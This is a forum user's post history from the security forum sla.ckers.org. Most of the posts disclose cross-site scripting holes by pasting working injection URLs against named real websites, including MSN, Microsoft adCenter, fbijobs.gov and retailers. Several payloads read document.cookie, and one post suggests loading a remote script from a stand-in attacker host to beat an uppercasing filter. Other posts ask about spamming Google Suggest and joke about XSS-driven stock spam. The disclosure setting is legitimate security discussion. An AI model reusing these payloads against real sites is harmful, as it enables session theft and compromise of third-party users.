Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 1
Results 1 - 24 of 24
7 years ago
thomaspollet
I ran wget for a couple of hours, don't know if it has anything to do with that, I only used rsnake, not the rest.
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
welcome to google suggest :) Takes a while to update their lists ... There's rsnake rsnake xss rsnake xss cheat sheet ... Regards, Thomas
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
that's when they use the indices, if goog uses the search queries to suggest something and lots of people turn out to be looking for rsnake it may come up. Like: myspace worm + google query for rsnake on every page... Regards, T
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
Hi, somebody knows if it is possible to spam google suggestions ? Regards, Thomas
Forum: Search Engine Hacking and SEO
7 years ago
thomaspollet
neuroo, if the input validation was always done like that, the number of sql inj/xss/file inc wouldn't be as high as it is now... then there's the use of xsl stylesheets which is a powerful way to add structure and eyecandy to basic (xml) data whereas now these things are commonly implemented in the same code as the fetching of the data. I don't know about every os cms but I've seen alot which 'ju
Forum: Projects
7 years ago
thomaspollet
jungsonn, you have some code open sourced somewhere? I wasn't especially talking about security but more general software development: imo good software design mitigates the security risks: in a layered approach, input validation can be performed at the different levels and in an organised way, that's true for all software. Whenever i see something like $result=mysql_query($query); print '&l
Forum: Projects
7 years ago
thomaspollet
Drupal is pretty nice but as all other cms's it's developed around a need for features and user functionality. From a software engineering point of view all cms's are just webpages on steroids. The idea I had when I was thinking about cms's was based on strict separation of different layers: there's -data -application logic -page structure -style now these parts can be implemented using -db
Forum: Projects
7 years ago
thomaspollet
8. cms
Hello, What content management systems do you like? Some time ago I started coding a pet cms but as the cms-o-sphere is crowded enough I quit it. Yet I'm still frustrated with the design and coding of most cms's. Is there a cms out there which does not suck? Is it worth the time coding yet another cms? Greets, Thomas
Forum: Projects
7 years ago
thomaspollet
http://www.restorationhardware.com/rh/search/search_results.jsp?refineByValue=%3C/script%3E%3Cscript%3Ealert('b00')%3C/script%3EBath%3ABath+Hardware%3ATowel+Bars+%26+Tissue+Holders&link=refineby
Forum: Full Disclosure
7 years ago
thomaspollet
https://www.adorama.com/catalog.tpl?op=process&func=Login&xemail=%3Cscript%3Ealert('hack3r%20safe!')%3C/script%3E
Forum: Full Disclosure
7 years ago
thomaspollet
from fd thread : http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&
Forum: Full Disclosure
7 years ago
thomaspollet
http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E& this one converts to uppercase, is there a XSS.JS up somewhere ? <SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS> should work...
Forum: Full Disclosure
7 years ago
thomaspollet
that hackersafe is just the next lie in infosec. Providing that nice fuzzy false sense of security feeling. Makes good .biz i suppose. http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E google intext:"hacker safe" ;)
Forum: Full Disclosure
8 years ago
thomaspollet
http://www.prodigy.msn.com/Salud/Tusalud/SaludMedicinas/default.asp?id_articulo=%22%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Forum: Full Disclosure
8 years ago
thomaspollet
http://astrocenter.astrology.msn.com/msn/DeptChinWeek.aspx?When=1);alert(document.cookie&Af=-1000
Forum: Full Disclosure
8 years ago
thomaspollet
lol "TEST and Demonstration site for Acunetix Web Vulnerability Scanner" tja :s
Forum: Full Disclosure
8 years ago
thomaspollet
acunetix :p POST http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure
8 years ago
thomaspollet
http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn
Forum: Full Disclosure
8 years ago
thomaspollet
I have a xss q: consider following html injection: http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style="background-image:url(javascript:alert(2))"> this results in <input type="text" value="" style="background-image:url(javascript:alert(2))"> why don't I get a pop-up on the msn site while the same tag does execute js in a clean ht
Forum: Full Disclosure
8 years ago
thomaspollet
https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118
Forum: Full Disclosure
8 years ago
thomaspollet
>btw, how long do companies like trustE,paypal need to fix their holes? paypal takes too long, last hole I reported took more than a week and several mails to get fixed. They don't have a 'standard' security@ mail-address, they don't monitor public mailing lists. In short, they suck at securing their customers. http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside <-- full
Forum: Full Disclosure
8 years ago
thomaspollet
http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert(1)%3C/script%3E
Forum: Full Disclosure
8 years ago
thomaspollet
I reported xss in myheadlines phpnuke module, yet it's still live on some places: http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474
Forum: Full Disclosure
8 years ago
thomaspollet
I reported the phpnuke.org xss to them a while ago. Sad they haven't fixed since then. + I love the stock market xss: go figure someone spamming about stock xyz skyrocketting, putting xss'ed links to nasdaq etc. on it...profit! someone coding an xss scanner/fuzzer? I have some ideas on this subject.
Forum: Full Disclosure
Current Page: 1 of 1